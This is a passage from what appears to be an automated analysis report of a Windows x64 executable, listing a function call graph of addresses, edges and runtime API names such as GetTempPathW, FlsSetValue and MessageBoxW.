API calls 15417->15420 15417->15424 15418->15423 15419 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15421 7ff7c5be2be3 15419->15421 15420->15423 15421->15327 15422 7ff7c5beda00 47 API calls 15422->15423 15423->15422 15423->15424 15424->15419 15624 7ff7c5bdff74 15425->15624 15429 7ff7c5be3a37 15428->15429 15641 7ff7c5becb60 15429->15641 15435 7ff7c5be3186 15434->15435 15483 7ff7c5bdfde0 15435->15483 15440 7ff7c5be3a20 45 API calls 15443 7ff7c5be32c3 15440->15443 15441 7ff7c5be3a20 45 API calls 15442 7ff7c5be334c 15441->15442 15442->15393 15443->15441 15443->15442 15443->15443 15445 7ff7c5be3638 15444->15445 15447 7ff7c5be36a0 15444->15447 15446 7ff7c5beda00 47 API calls 15445->15446 15445->15447 15446->15447 15447->15393 15449 7ff7c5be37d9 15448->15449 15450 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15449->15450 15451 7ff7c5be380a 15449->15451 15450->15451 15451->15393 15453 7ff7c5be0de3 15452->15453 15454 7ff7c5be0e12 15453->15454 15456 7ff7c5be0ecf 15453->15456 15455 7ff7c5bdfde0 12 API calls 15454->15455 15458 7ff7c5be0e4f 15454->15458 15455->15458 15457 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15456->15457 15457->15458 15458->15393 15460 7ff7c5be09d3 15459->15460 15461 7ff7c5be0a02 15460->15461 15463 7ff7c5be0abf 15460->15463 15462 7ff7c5bdfde0 12 API calls 15461->15462 15465 7ff7c5be0a3f 15461->15465 15462->15465 15464 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15463->15464 15464->15465 15465->15393 15467 7ff7c5be11f3 15466->15467 15468 7ff7c5be1222 15467->15468 15470 7ff7c5be12df 15467->15470 15469 7ff7c5bdfde0 12 API calls 15468->15469 15472 7ff7c5be125f 15468->15472 15469->15472 15471 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15470->15471 15471->15472 15472->15393 15474 7ff7c5beda28 15473->15474 15475 7ff7c5beda6d 15474->15475 15476 7ff7c5be3a20 45 API calls 15474->15476 15479 7ff7c5beda2d __scrt_get_show_window_mode 15474->15479 15482 7ff7c5beda56 __scrt_get_show_window_mode 15474->15482 15475->15479 15475->15482 15621 7ff7c5bef0b8 15475->15621 15476->15475 15477 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15477->15479 15479->15393 15482->15477 15482->15479 15484 7ff7c5bdfe17 15483->15484 15490 7ff7c5bdfe06 15483->15490 15485 7ff7c5becacc _fread_nolock 12 API calls 15484->15485 15484->15490 15486 7ff7c5bdfe44 15485->15486 15487 7ff7c5bdfe58 15486->15487 15488 7ff7c5be9e18 __free_lconv_mon 11 API calls 15486->15488 15489 7ff7c5be9e18 __free_lconv_mon 11 API calls 15487->15489 15488->15487 15489->15490 15491 7ff7c5bed718 15490->15491 15492 7ff7c5bed735 15491->15492 15493 7ff7c5bed768 15491->15493 15494 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15492->15494 15493->15492 15495 7ff7c5bed79a 15493->15495 15503 7ff7c5be32a1 15494->15503 15500 7ff7c5bed8ad 15495->15500 15508 7ff7c5bed7e2 15495->15508 15496 7ff7c5bed99f 15546 7ff7c5becc04 15496->15546 15498 7ff7c5bed965 15539 7ff7c5becf9c 15498->15539 15499 7ff7c5bed934 15532 7ff7c5bed27c 15499->15532 15500->15496 15500->15498 15500->15499 15502 7ff7c5bed8f7 15500->15502 15505 7ff7c5bed8ed 15500->15505 15522 7ff7c5bed4ac 15502->15522 15503->15440 15503->15443 15505->15498 15507 7ff7c5bed8f2 15505->15507 15507->15499 15507->15502 15508->15503 15513 7ff7c5be91ac 15508->15513 15511 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15512 7ff7c5bed9fc 15511->15512 15514 7ff7c5be91c3 15513->15514 15515 7ff7c5be91b9 15513->15515 15516 7ff7c5be4444 _wfindfirst32i64 11 API calls 15514->15516 15515->15514 15520 7ff7c5be91de 15515->15520 15517 7ff7c5be91ca 15516->15517 15555 7ff7c5be9db0 15517->15555 15519 7ff7c5be91d6 15519->15503 15519->15511 15520->15519 15521 7ff7c5be4444 _wfindfirst32i64 11 API calls 15520->15521 15521->15517 15557 7ff7c5bf31cc 15522->15557 15526 7ff7c5bed554 15527 7ff7c5bed558 15526->15527 15528 7ff7c5bed5a9 15526->15528 15530 7ff7c5bed574 15526->15530 15527->15503 15610 7ff7c5bed098 15528->15610 15606 7ff7c5bed354 15530->15606 15533 7ff7c5bf31cc 38 API calls 15532->15533 15534 7ff7c5bed2c6 15533->15534 15535 7ff7c5bf2c14 37 API calls 15534->15535 15536 7ff7c5bed316 15535->15536 15537 7ff7c5bed31a 15536->15537 15538 7ff7c5bed354 45 API calls 15536->15538 15537->15503 15538->15537 15540 7ff7c5bf31cc 38 API calls 15539->15540 15541 7ff7c5becfe7 15540->15541 15542 7ff7c5bf2c14 37 API calls 15541->15542 15544 7ff7c5bed03f 15542->15544 15543 7ff7c5bed043 15543->15503 15544->15543 15545 7ff7c5bed098 45 API calls 15544->15545 15545->15543 15547 7ff7c5becc7c 15546->15547 15548 7ff7c5becc49 15546->15548 15550 7ff7c5becc94 15547->15550 15553 7ff7c5becd15 15547->15553 15549 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15548->15549 15552 7ff7c5becc75 __scrt_get_show_window_mode 15549->15552 15551 7ff7c5becf9c 46 API calls 15550->15551 15551->15552 15552->15503 15553->15552 15554 7ff7c5be3a20 45 API calls 15553->15554 15554->15552 15556 7ff7c5be9c48 _invalid_parameter_noinfo 37 API calls 15555->15556 15558 7ff7c5bf321f fegetenv 15557->15558 15559 7ff7c5bf712c 37 API calls 15558->15559 15565 7ff7c5bf3272 15559->15565 15560 7ff7c5bf3362 15561 7ff7c5bf712c 37 API calls 15560->15561 15563 7ff7c5bf338c 15561->15563 15562 7ff7c5bf329f 15564 7ff7c5be91ac __std_exception_copy 37 API calls 15562->15564 15568 7ff7c5bf712c 37 API calls 15563->15568 15569 7ff7c5bf331d 15564->15569 15565->15560 15566 7ff7c5bf333c 15565->15566 15567 7ff7c5bf328d 15565->15567 15570 7ff7c5be91ac __std_exception_copy 37 API calls 15566->15570 15567->15560 15567->15562 15571 7ff7c5bf339d 15568->15571 15572 7ff7c5bf4444 15569->15572 15576 7ff7c5bf3325 15569->15576 15570->15569 15574 7ff7c5bf7320 20 API calls 15571->15574 15573 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15572->15573 15575 7ff7c5bf4459 15573->15575 15584 7ff7c5bf3406 __scrt_get_show_window_mode 15574->15584 15577 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15576->15577 15578 7ff7c5bed4f9 15577->15578 15602 7ff7c5bf2c14 15578->15602 15579 7ff7c5bf37af __scrt_get_show_window_mode 15580 7ff7c5bf3aef 15581 7ff7c5bf2d30 37 API calls 15580->15581 15588 7ff7c5bf4207 15581->15588 15582 7ff7c5bf3a9b 15582->15580 15585 7ff7c5bf445c memcpy_s 37 API calls 15582->15585 15583 7ff7c5bf3447 memcpy_s 15597 7ff7c5bf3d8b memcpy_s __scrt_get_show_window_mode 15583->15597 15598 7ff7c5bf38a3 memcpy_s __scrt_get_show_window_mode 15583->15598 15584->15579 15584->15583 15586 7ff7c5be4444 _wfindfirst32i64 11 API calls 15584->15586 15585->15580 15587 7ff7c5bf3880 15586->15587 15589 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15587->15589 15591 7ff7c5bf445c memcpy_s 37 API calls 15588->15591 15595 7ff7c5bf4262 15588->15595 15589->15583 15590 7ff7c5bf43e8 15592 7ff7c5bf712c 37 API calls 15590->15592 15591->15595 15592->15576 15593 7ff7c5be4444 11 API calls _wfindfirst32i64 15593->15597 15594 7ff7c5be4444 11 API calls _wfindfirst32i64 15594->15598 15595->15590 15599 7ff7c5bf2d30 37 API calls 15595->15599 15601 7ff7c5bf445c memcpy_s 37 API calls 15595->15601 15596 7ff7c5be9db0 37 API calls _invalid_parameter_noinfo 15596->15598 15597->15580 15597->15582 15597->15593 15600 7ff7c5be9db0 37 API calls _invalid_parameter_noinfo 15597->15600 15598->15582 15598->15594 15598->15596 15599->15595 15600->15597 15601->15595 15603 7ff7c5bf2c33 15602->15603 15604 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15603->15604 15605 7ff7c5bf2c5e memcpy_s 15603->15605 15604->15605 15605->15526 15607 7ff7c5bed380 memcpy_s 15606->15607 15608 7ff7c5be3a20 45 API calls 15607->15608 15609 7ff7c5bed43a memcpy_s __scrt_get_show_window_mode 15607->15609 15608->15609 15609->15527 15611 7ff7c5bed0d3 15610->15611 15615 7ff7c5bed120 memcpy_s 15610->15615 15612 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15611->15612 15613 7ff7c5bed0ff 15612->15613 15613->15527 15614 7ff7c5bed18b 15616 7ff7c5be91ac __std_exception_copy 37 API calls 15614->15616 15615->15614 15617 7ff7c5be3a20 45 API calls 15615->15617 15618 7ff7c5bed1cd memcpy_s 15616->15618 15617->15614 15619 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15618->15619 15620 7ff7c5bed278 15619->15620 15623 7ff7c5bef0dc WideCharToMultiByte 15621->15623 15625 7ff7c5bdffb3 15624->15625 15626 7ff7c5bdffa1 15624->15626 15629 7ff7c5bdffc0 15625->15629 15632 7ff7c5bdfffd 15625->15632 15627 7ff7c5be4444 _wfindfirst32i64 11 API calls 15626->15627 15628 7ff7c5bdffa6 15627->15628 15631 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15628->15631 15630 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15629->15630 15640 7ff7c5bdffb1 15630->15640 15631->15640 15633 7ff7c5be00a6 15632->15633 15634 7ff7c5be4444 _wfindfirst32i64 11 API calls 15632->15634 15635 7ff7c5be4444 _wfindfirst32i64 11 API calls 15633->15635 15633->15640 15636 7ff7c5be009b 15634->15636 15637 7ff7c5be0150 15635->15637 15638 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15636->15638 15639 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15637->15639 15638->15633 15639->15640 15640->15327 15642 7ff7c5be3a5f 15641->15642 15643 7ff7c5becb79 15641->15643 15645 7ff7c5becbcc 15642->15645 15643->15642 15649 7ff7c5bf2424 15643->15649 15646 7ff7c5becbe5 15645->15646 15648 7ff7c5be3a6f 15645->15648 15646->15648 15693 7ff7c5bf1790 15646->15693 15648->15327 15661 7ff7c5bea620 GetLastError 15649->15661 15652 7ff7c5bf247e 15652->15642 15662 7ff7c5bea644 FlsGetValue 15661->15662 15663 7ff7c5bea661 FlsSetValue 15661->15663 15664 7ff7c5bea65b 15662->15664 15680 7ff7c5bea651 15662->15680 15665 7ff7c5bea673 15663->15665 15663->15680 15664->15663 15667 7ff7c5bedd40 _wfindfirst32i64 11 API calls 15665->15667 15666 7ff7c5bea6cd SetLastError 15668 7ff7c5bea6ed 15666->15668 15669 7ff7c5bea6da 15666->15669 15670 7ff7c5bea682 15667->15670 15684 7ff7c5be920c 15668->15684 15669->15652 15683 7ff7c5bef788 EnterCriticalSection 15669->15683 15672 7ff7c5bea6a0 FlsSetValue 15670->15672 15673 7ff7c5bea690 FlsSetValue 15670->15673 15676 7ff7c5bea6be 15672->15676 15677 7ff7c5bea6ac FlsSetValue 15672->15677 15675 7ff7c5bea699 15673->15675 15678 7ff7c5be9e18 __free_lconv_mon 11 API calls 15675->15678 15679 7ff7c5bea3c4 _wfindfirst32i64 11 API calls 15676->15679 15677->15675 15678->15680 15681 7ff7c5bea6c6 15679->15681 15680->15666 15682 7ff7c5be9e18 __free_lconv_mon 11 API calls 15681->15682 15682->15666 15685 7ff7c5bf2770 _CallSETranslator EnterCriticalSection LeaveCriticalSection 15684->15685 15687 7ff7c5be9215 15685->15687 15686 7ff7c5be9224 15689 7ff7c5be922d IsProcessorFeaturePresent 15686->15689 15690 7ff7c5be9257 _CallSETranslator 15686->15690 15687->15686 15688 7ff7c5bf27c0 _CallSETranslator 44 API calls 15687->15688 15688->15686 15691 7ff7c5be923c 15689->15691 15692 7ff7c5be9ae4 _wfindfirst32i64 14 API calls 15691->15692 15692->15690 15694 7ff7c5bea620 _CallSETranslator 45 API calls 15693->15694 15695 7ff7c5bf1799 15694->15695 15703 7ff7c5be42ec EnterCriticalSection 15696->15703 15705 7ff7c5bd24ec 15704->15705 15706 7ff7c5be3be4 49 API calls 15705->15706 15707 7ff7c5bd253f 15706->15707 15708 7ff7c5be4444 _wfindfirst32i64 11 API calls 15707->15708 15709 7ff7c5bd2544 15708->15709 15723 7ff7c5be4464 15709->15723 15712 7ff7c5bd1b30 49 API calls 15713 7ff7c5bd2573 __scrt_get_show_window_mode 15712->15713 15714 7ff7c5bd7a30 57 API calls 15713->15714 15715 7ff7c5bd25a0 15714->15715 15716 7ff7c5bd25a5 15715->15716 15717 7ff7c5bd25df MessageBoxA 15715->15717 15719 7ff7c5bd7a30 57 API calls 15716->15719 15718 7ff7c5bd25f9 15717->15718 15720 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15718->15720 15721 7ff7c5bd25bf MessageBoxW 15719->15721 15722 7ff7c5bd2609 15720->15722 15721->15718 15722->14935 15724 7ff7c5bea798 _wfindfirst32i64 11 API calls 15723->15724 15725 7ff7c5be447b 15724->15725 15726 7ff7c5bedd40 _wfindfirst32i64 11 API calls 15725->15726 15727 7ff7c5be44bb 15725->15727 15732 7ff7c5bd254b 15725->15732 15728 7ff7c5be44b0 15726->15728 15727->15732 15735 7ff7c5bee418 15727->15735 15729 7ff7c5be9e18 __free_lconv_mon 11 API calls 15728->15729 15729->15727 15732->15712 15733 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15734 7ff7c5be4500 15733->15734 15740 7ff7c5bee435 15735->15740 15736 7ff7c5bee43a 15737 7ff7c5be4444 _wfindfirst32i64 11 API calls 15736->15737 15738 7ff7c5be44e1 15736->15738 15739 7ff7c5bee444 15737->15739 15738->15732 15738->15733 15741 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15739->15741 15740->15736 15740->15738 15742 7ff7c5bee484 15740->15742 15741->15738 15742->15738 15743 7ff7c5be4444 _wfindfirst32i64 11 API calls 15742->15743 15743->15739 15745 7ff7c5bd7b64 WideCharToMultiByte 15744->15745 15746 7ff7c5bd7bd2 WideCharToMultiByte 15744->15746 15747 7ff7c5bd7ba5 15745->15747 15748 7ff7c5bd7b8e 15745->15748 15749 7ff7c5bd7bff 15746->15749 15754 7ff7c5bd3c05 15746->15754 15747->15746 15752 7ff7c5bd7bbb 15747->15752 15750 7ff7c5bd2620 57 API calls 15748->15750 15751 7ff7c5bd2620 57 API calls 15749->15751 15750->15754 15751->15754 15753 7ff7c5bd2620 57 API calls 15752->15753 15753->15754 15754->14944 15754->14946 15756 7ff7c5be9123 15755->15756 15759 7ff7c5bd6a0e 15755->15759 15757 7ff7c5be91ac __std_exception_copy 37 API calls 15756->15757 15756->15759 15758 7ff7c5be9150 15757->15758 15758->15759 15760 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15758->15760 15759->14965 15761 7ff7c5be9180 15760->15761 15763 7ff7c5bd17d4 15762->15763 15764 7ff7c5bd17e4 15762->15764 15765 7ff7c5bd3cb0 116 API calls 15763->15765 15766 7ff7c5bd7200 83 API calls 15764->15766 15795 7ff7c5bd1842 15764->15795 15765->15764 15767 7ff7c5bd1815 15766->15767 15767->15795 15796 7ff7c5bdf934 15767->15796 15769 7ff7c5bd182b 15771 7ff7c5bd182f 15769->15771 15772 7ff7c5bd184c 15769->15772 15770 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15773 7ff7c5bd19c0 15770->15773 15774 7ff7c5bd24d0 59 API calls 15771->15774 15800 7ff7c5bdf5fc 15772->15800 15773->14980 15773->14981 15774->15795 15777 7ff7c5bdf934 73 API calls 15779 7ff7c5bd18d1 15777->15779 15778 7ff7c5bd24d0 59 API calls 15778->15795 15780 7ff7c5bd18e3 15779->15780 15781 7ff7c5bd18fe 15779->15781 15782 7ff7c5bd24d0 59 API calls 15780->15782 15783 7ff7c5bdf5fc _fread_nolock 53 API calls 15781->15783 15782->15795 15784 7ff7c5bd1913 15783->15784 15785 7ff7c5bd1925 15784->15785 15786 7ff7c5bd1867 15784->15786 15803 7ff7c5bdf370 15785->15803 15786->15778 15789 7ff7c5bd193d 15790 7ff7c5bd2770 59 API calls 15789->15790 15790->15795 15791 7ff7c5bd1993 15793 7ff7c5bdf2ac 74 API calls 15791->15793 15791->15795 15792 7ff7c5bd1950 15792->15791 15794 7ff7c5bd2770 59 API calls 15792->15794 15793->15795 15794->15791 15795->15770 15797 7ff7c5bdf964 15796->15797 15809 7ff7c5bdf6c4 15797->15809 15799 7ff7c5bdf97d 15799->15769 15821 7ff7c5bdf61c 15800->15821 15804 7ff7c5bd1939 15803->15804 15805 7ff7c5bdf379 15803->15805 15804->15789 15804->15792 15806 7ff7c5be4444 _wfindfirst32i64 11 API calls 15805->15806 15807 7ff7c5bdf37e 15806->15807 15808 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15807->15808 15808->15804 15810 7ff7c5bdf72e 15809->15810 15811 7ff7c5bdf6ee 15809->15811 15810->15811 15813 7ff7c5bdf73a 15810->15813 15812 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15811->15812 15814 7ff7c5bdf715 15812->15814 15820 7ff7c5be42ec EnterCriticalSection 15813->15820 15814->15799 15822 7ff7c5bdf646 15821->15822 15833 7ff7c5bd1861 15821->15833 15823 7ff7c5bdf655 __scrt_get_show_window_mode 15822->15823 15824 7ff7c5bdf692 15822->15824 15822->15833 15826 7ff7c5be4444 _wfindfirst32i64 11 API calls 15823->15826 15834 7ff7c5be42ec EnterCriticalSection 15824->15834 15828 7ff7c5bdf66a 15826->15828 15831 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15828->15831 15831->15833 15833->15777 15833->15786 15928 7ff7c5bd6720 15835->15928 15837 7ff7c5bd1454 15838 7ff7c5bd1459 15837->15838 15937 7ff7c5bd6a40 15837->15937 15838->15006 15841 7ff7c5bd14a7 15844 7ff7c5bd14e0 15841->15844 15847 7ff7c5bd3cb0 116 API calls 15841->15847 15842 7ff7c5bd1487 15843 7ff7c5bd24d0 59 API calls 15842->15843 15846 7ff7c5bd149d 15843->15846 15845 7ff7c5bdf934 73 API calls 15844->15845 15848 7ff7c5bd14f2 15845->15848 15846->15006 15849 7ff7c5bd14bf 15847->15849 15850 7ff7c5bd1516 15848->15850 15851 7ff7c5bd14f6 15848->15851 15849->15844 15852 7ff7c5bd14c7 15849->15852 15854 7ff7c5bd1534 15850->15854 15855 7ff7c5bd151c 15850->15855 15853 7ff7c5bd24d0 59 API calls 15851->15853 15856 7ff7c5bd2770 59 API calls 15852->15856 15864 7ff7c5bd14d6 __std_exception_copy 15853->15864 15859 7ff7c5bd1575 15854->15859 15860 7ff7c5bd1556 15854->15860 15962 7ff7c5bd1050 15855->15962 15856->15864 15858 7ff7c5bd1624 15862 7ff7c5bdf2ac 74 API calls 15858->15862 15859->15864 15865 7ff7c5bdf5fc _fread_nolock 53 API calls 15859->15865 15867 7ff7c5bd15d5 15859->15867 15980 7ff7c5bdfd3c 15859->15980 15863 7ff7c5bd24d0 59 API calls 15860->15863 15861 7ff7c5bdf2ac 74 API calls 15861->15858 15862->15846 15863->15864 15864->15858 15864->15861 15865->15859 15868 7ff7c5bd24d0 59 API calls 15867->15868 15868->15864 15870 7ff7c5bd29a6 15869->15870 15871 7ff7c5bd1b30 49 API calls 15870->15871 15873 7ff7c5bd29db 15871->15873 15872 7ff7c5bd2de1 15873->15872 15874 7ff7c5bd3b20 49 API calls 15873->15874 15875 7ff7c5bd2a4f 15874->15875 16559 7ff7c5bd2e00 15875->16559 15878 7ff7c5bd2a91 15880 7ff7c5bd6720 98 API calls 15878->15880 15879 7ff7c5bd2aca 15881 7ff7c5bd2e00 75 API calls 15879->15881 15882 7ff7c5bd2a99 15880->15882 15883 7ff7c5bd2b1c 15881->15883 15884 7ff7c5bd2aba 15882->15884 16567 7ff7c5bd6600 15882->16567 15885 7ff7c5bd2b86 15883->15885 15886 7ff7c5bd2b20 15883->15886 15887 7ff7c5bd2770 59 API calls 15884->15887 15891 7ff7c5bd2ac3 15884->15891 15889 7ff7c5bd2e00 75 API calls 15885->15889 15890 7ff7c5bd6720 98 API calls 15886->15890 15887->15891 15892 7ff7c5bd2bb2 15889->15892 15893 7ff7c5bd2b28 15890->15893 15895 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15891->15895 15896 7ff7c5bd2e00 75 API calls 15892->15896 15905 7ff7c5bd2c12 15892->15905 15893->15884 15897 7ff7c5bd6600 138 API calls 15893->15897 15894 7ff7c5bd6720 98 API calls 15899 7ff7c5bd2c22 15894->15899 15900 7ff7c5bd2b7b 15895->15900 15901 7ff7c5bd2be2 15896->15901 15898 7ff7c5bd2b45 15897->15898 15898->15884 15903 7ff7c5bd2dc6 15898->15903 15899->15872 15904 7ff7c5bd1af0 59 API calls 15899->15904 15917 7ff7c5bd2d3f 15899->15917 15900->15006 15902 7ff7c5bd2e00 75 API calls 15901->15902 15901->15905 15902->15905 15906 7ff7c5bd2770 59 API calls 15903->15906 15905->15872 15905->15894 15925 7ff7c5bd1795 15924->15925 15927 7ff7c5bd17a1 15924->15927 15926 7ff7c5bd2770 59 API calls 15925->15926 15926->15927 15927->15006 15929 7ff7c5bd6768 15928->15929 15930 7ff7c5bd6732 15928->15930 15929->15837 15984 7ff7c5bd16d0 15930->15984 15938 7ff7c5bd6a50 15937->15938 15939 7ff7c5bd1b30 49 API calls 15938->15939 15940 7ff7c5bd6a81 15939->15940 15941 7ff7c5bd6c4b 15940->15941 15942 7ff7c5bd1b30 49 API calls 15940->15942 15943 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15941->15943 15945 7ff7c5bd6aa8 15942->15945 15944 7ff7c5bd147f 15943->15944 15944->15841 15944->15842 15945->15941 16509 7ff7c5be50e8 15945->16509 15947 7ff7c5bd6bb9 15948 7ff7c5bd7a30 57 API calls 15947->15948 15950 7ff7c5bd6bd1 15948->15950 15949 7ff7c5bd6add 15949->15941 15949->15947 15949->15949 15959 7ff7c5be50e8 49 API calls 15949->15959 15960 7ff7c5bd7a30 57 API calls 15949->15960 15961 7ff7c5bd78a0 58 API calls 15949->15961 15951 7ff7c5bd6c7a 15950->15951 15955 7ff7c5bd6990 61 API calls 15950->15955 15958 7ff7c5bd6c02 __std_exception_copy 15950->15958 15952 7ff7c5bd3cb0 116 API calls 15951->15952 15952->15941 15953 7ff7c5bd6c3f 16518 7ff7c5bd2880 15953->16518 15954 7ff7c5bd6c6e 15957 7ff7c5bd2880 59 API calls 15954->15957 15955->15958 15957->15951 15958->15953 15958->15954 15959->15949 15960->15949 15961->15949 15963 7ff7c5bd10a6 15962->15963 15964 7ff7c5bd10d3 15963->15964 15965 7ff7c5bd10ad 15963->15965 15968 7ff7c5bd10ed 15964->15968 15969 7ff7c5bd1109 15964->15969 15966 7ff7c5bd2770 59 API calls 15965->15966 15967 7ff7c5bd10c0 15966->15967 15967->15864 15970 7ff7c5bd24d0 59 API calls 15968->15970 15971 7ff7c5bd111b 15969->15971 15978 7ff7c5bd1137 memcpy_s 15969->15978 15981 7ff7c5bdfd6c 15980->15981 16544 7ff7c5bdfa8c 15981->16544 15983 7ff7c5bdfd8a 15983->15859 15985 7ff7c5bd16f5 15984->15985 15986 7ff7c5bd2770 59 API calls 15985->15986 15987 7ff7c5bd1738 15985->15987 15986->15987 15988 7ff7c5bd6780 15987->15988 15989 7ff7c5bd6798 15988->15989 15990 7ff7c5bd680b 15989->15990 15991 7ff7c5bd67b8 15989->15991 15992 7ff7c5bd6810 GetTempPathW 15990->15992 15993 7ff7c5bd6990 61 API calls 15991->15993 15994 7ff7c5bd6825 15992->15994 15995 7ff7c5bd67c4 15993->15995 16028 7ff7c5bd2470 15994->16028 16052 7ff7c5bd6480 15995->16052 16000 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16003 7ff7c5bd674d 16000->16003 16003->15929 16006 7ff7c5bd68e6 16010 7ff7c5bd7b40 59 API calls 16006->16010 16007 7ff7c5bd683e __std_exception_copy 16007->16006 16011 7ff7c5bd6871 16007->16011 16032 7ff7c5be736c 16007->16032 16035 7ff7c5bd78a0 16007->16035 16012 7ff7c5bd7a30 57 API calls 16011->16012 16022 7ff7c5bd68aa __std_exception_copy 16011->16022 16022->16000 16029 7ff7c5bd2495 16028->16029 16086 7ff7c5be3e38 16029->16086 16258 7ff7c5be6f98 16032->16258 16036 7ff7c5bdadb0 16035->16036 16053 7ff7c5bd648c 16052->16053 16054 7ff7c5bd7a30 57 API calls 16053->16054 16055 7ff7c5bd64ae 16054->16055 16056 7ff7c5bd64b6 16055->16056 16057 7ff7c5bd64c9 ExpandEnvironmentStringsW 16055->16057 16058 7ff7c5bd2770 59 API calls 16056->16058 16059 7ff7c5bd64ef __std_exception_copy 16057->16059 16065 7ff7c5bd64c2 16058->16065 16060 7ff7c5bd64f3 16059->16060 16061 7ff7c5bd6506 16059->16061 16063 7ff7c5bd2770 59 API calls 16060->16063 16066 7ff7c5bd6514 16061->16066 16067 7ff7c5bd6520 16061->16067 16062 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16064 7ff7c5bd65e8 16062->16064 16063->16065 16064->16022 16076 7ff7c5be66b4 16064->16076 16065->16062 16393 7ff7c5be5f44 16066->16393 16400 7ff7c5be5348 16067->16400 16070 7ff7c5bd651e 16071 7ff7c5bd653a 16070->16071 16074 7ff7c5bd654d __scrt_get_show_window_mode 16070->16074 16077 7ff7c5be66d4 16076->16077 16078 7ff7c5be66c1 16076->16078 16501 7ff7c5be6338 16077->16501 16080 7ff7c5be4444 _wfindfirst32i64 11 API calls 16078->16080 16088 7ff7c5be3e92 16086->16088 16087 7ff7c5be3eb7 16090 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16087->16090 16088->16087 16089 7ff7c5be3ef3 16088->16089 16104 7ff7c5be21f0 16089->16104 16093 7ff7c5be3ee1 16090->16093 16092 7ff7c5be3fd4 16095 7ff7c5be9e18 __free_lconv_mon 11 API calls 16092->16095 16094 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16093->16094 16097 7ff7c5bd24b4 16094->16097 16095->16093 16097->16007 16098 7ff7c5be3ffa 16098->16092 16101 7ff7c5be4004 16098->16101 16099 7ff7c5be3fa9 16102 7ff7c5be9e18 __free_lconv_mon 11 API calls 16099->16102 16100 7ff7c5be3fa0 16100->16092 16100->16099 16102->16093 16105 7ff7c5be222e 16104->16105 16106 7ff7c5be221e 16104->16106 16107 7ff7c5be2237 16105->16107 16111 7ff7c5be2265 16105->16111 16108 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16106->16108 16109 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16107->16109 16110 7ff7c5be225d 16108->16110 16109->16110 16110->16092 16110->16098 16110->16099 16110->16100 16111->16106 16111->16110 16115 7ff7c5be2c04 16111->16115 16148 7ff7c5be2650 16111->16148 16185 7ff7c5be1de0 16111->16185 16116 7ff7c5be2c46 16115->16116 16117 7ff7c5be2cb7 16115->16117 16118 7ff7c5be2ce1 16116->16118 16119 7ff7c5be2c4c 16116->16119 16120 7ff7c5be2d10 16117->16120 16121 7ff7c5be2cbc 16117->16121 16149 7ff7c5be2674 16148->16149 16150 7ff7c5be265e 16148->16150 16151 7ff7c5be26b4 16149->16151 16154 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16149->16154 16150->16151 16152 7ff7c5be2c46 16150->16152 16153 7ff7c5be2cb7 16150->16153 16151->16111 16155 7ff7c5be2ce1 16152->16155 16156 7ff7c5be2c4c 16152->16156 16157 7ff7c5be2d10 16153->16157 16158 7ff7c5be2cbc 16153->16158 16154->16151 16241 7ff7c5be0228 16185->16241 16242 7ff7c5be026f 16241->16242 16243 7ff7c5be025d 16241->16243 16394 7ff7c5be5f62 16393->16394 16397 7ff7c5be5f95 16393->16397 16394->16397 16412 7ff7c5bef924 16394->16412 16397->16070 16401 7ff7c5be5364 16400->16401 16402 7ff7c5be53d2 16400->16402 16401->16402 16404 7ff7c5be5369 16401->16404 16446 7ff7c5bef090 16402->16446 16405 7ff7c5be5381 16404->16405 16406 7ff7c5be539e 16404->16406 16413 7ff7c5bef931 16412->16413 16414 7ff7c5bef93b 16412->16414 16413->16414 16449 7ff7c5beeea0 16446->16449 16510 7ff7c5bea620 _CallSETranslator 45 API calls 16509->16510 16512 7ff7c5be50fd 16510->16512 16511 7ff7c5beee97 16531 7ff7c5bdaf14 16511->16531 16512->16511 16515 7ff7c5beedb6 16512->16515 16516 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16515->16516 16517 7ff7c5beee8f 16516->16517 16517->15949 16534 7ff7c5bdaf28 IsProcessorFeaturePresent 16531->16534 16535 7ff7c5bdaf3f 16534->16535 16540 7ff7c5bdafc4 RtlCaptureContext RtlLookupFunctionEntry 16535->16540 16541 7ff7c5bdaff4 RtlVirtualUnwind 16540->16541 16542 7ff7c5bdaf53 16540->16542 16541->16542 16543 7ff7c5bdae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16542->16543 16545 7ff7c5bdfaac 16544->16545 16550 7ff7c5bdfad9 16544->16550 16546 7ff7c5bdfab6 16545->16546 16547 7ff7c5bdfae1 16545->16547 16545->16550 16550->15983 16560 7ff7c5bd2e34 16559->16560 16561 7ff7c5be3be4 49 API calls 16560->16561 16562 